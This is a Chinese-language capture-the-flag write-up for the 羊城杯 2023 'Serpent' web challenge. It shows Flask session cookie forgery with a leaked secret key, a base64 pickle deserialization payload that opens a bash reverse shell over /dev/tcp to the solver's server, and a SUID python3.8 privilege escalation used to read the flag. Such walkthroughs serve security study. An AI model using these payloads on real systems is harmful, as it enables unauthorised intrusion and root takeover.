羊城杯2023 Serpent-wp

0x1

题目提示有www.zip 下载得到里面的app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from flask import Flask, session
from secret import secret

@app.route('/verification')
def verification():
    try:
        attribute = session.get('Attribute')
        if not isinstance(attribute, dict):
            raise Exception
    except Exception:
        return 'Hacker!!!'
    if attribute.get('name') == 'admin':
        if attribute.get('admin') == 1:
            return secret
        else:
            return "Don't play tricks on me"
    else:
        return "You are a perfect stranger to me"

if __name__ == '__main__':
    app.run('0.0.0.0', port=80)

明显应该是 flask session伪造 ,具体可以看到https://antel0p3.github.io/2023/08/19/LitCTF2023-flagclick-wp/

1
2
3
4
5
6
# cookie 中得到session
$ python3 flask_session_cookie_manager.py decode -c "eyJBdHRyaWJ1dGUiOnsiYWRtaW4iOjAsIm5hbWUiOiJHV0hUIiwic2VjcmV0X2tleSI6IkdXSFRuNGhlaWp0RVRUIn19.ZPM8vQ.BukMzKlq_IzarfBPlj81mXkRZQc"
# {"Attribute":{"admin":0,"name":"GWHT","secret_key":"GWHTn4heijtETT"}}

$ python3 flask_session_cookie_manager.py encode -s "GWHTn4heijtETT" -t '{"Attribute":{"admin":1,"name":"admin","secret_key":"GWHTn4heijtETT"}}'
# eyJBdHRyaWJ1dGUiOnsiYWRtaW4iOjEsIm5hbWUiOiJhZG1pbiIsInNlY3JldF9rZXkiOiJHV0hUbjRoZWlqdEVUVCJ9fQ.ZPM9Yw.CSad0BXG0k7E6ds_Om4lYMcXIto

更改cookie后再次访问/verification可以看到

Hello admin, welcome to /ppppppppppick1e

0x2

访问 /ppppppppppick1e 看到Hello, admin 其他啥也没有

查看网络包头发现有Hint:Source in /src0de

0x3

访问 /src0de 得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
@app.route('/src0de')
def src0de():
    f = open(__file__, 'r')
    rsp = f.read()
    f.close()
    return rsp[rsp.index("@app.route('/src0de')"):]


@ app.route('/ppppppppppick1e')
def ppppppppppick1e():
    try:
        username = "admin"
        rsp = make_response("Hello, %s " % username)
        rsp.headers['hint'] = "Source in /src0de"
        pick1e = request.cookies.get('pick1e')
        if pick1e is not None:
            pick1e = base64.b64decode(pick1e)
        else:
            return rsp
        if check(pick1e):
            pick1e = pickle.loads(pick1e)
            return "Go for it!!!"
        else:
            return "No Way!!!"
    except Exception as e:
        error_message = str(e)
        return error_message
    return rsp


class GWHT():
    def __init__(self):
        pass
    if __name__ == '__main__':
        app.run('0.0.0.0', port=80)

明显21#pickle.loads存在 pickle 反序列化漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
import pickle
import pickletools
import base64

poc = b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/xx.xx.xx.xx/8888 0>&1"'		# 这里需要一个自己的vps公网ip
o.'''

pickletools.dis(poc)
print(poc)
print(base64.b64encode(poc))
# KGNvcwpzeXN0ZW0KUydiYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzQ3LjEwOS4zNi4yNi84ODg4IDA+JjEiJwpvLg==

具体参考

https://zhuanlan.zhihu.com/p/361349643 https://zhuanlan.zhihu.com/p/89132768

用cookie editor 加上 pick1e=KGNvcw...后刷新可以得到反弹shell

0x4

发现根目录下有flag 但是需要root权限读取 开始提权

1
2
3
4
5
6
7
8
9
10
$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/mount
/usr/bin/passwd
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/python3.8

可以看到 python3.8

1
2
$ python3.8 -c 'import os; os.execl("/bin/sh", "sh", "-p")'	# 执行完后没有回显  直接输指令就好
$ cat /flag
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP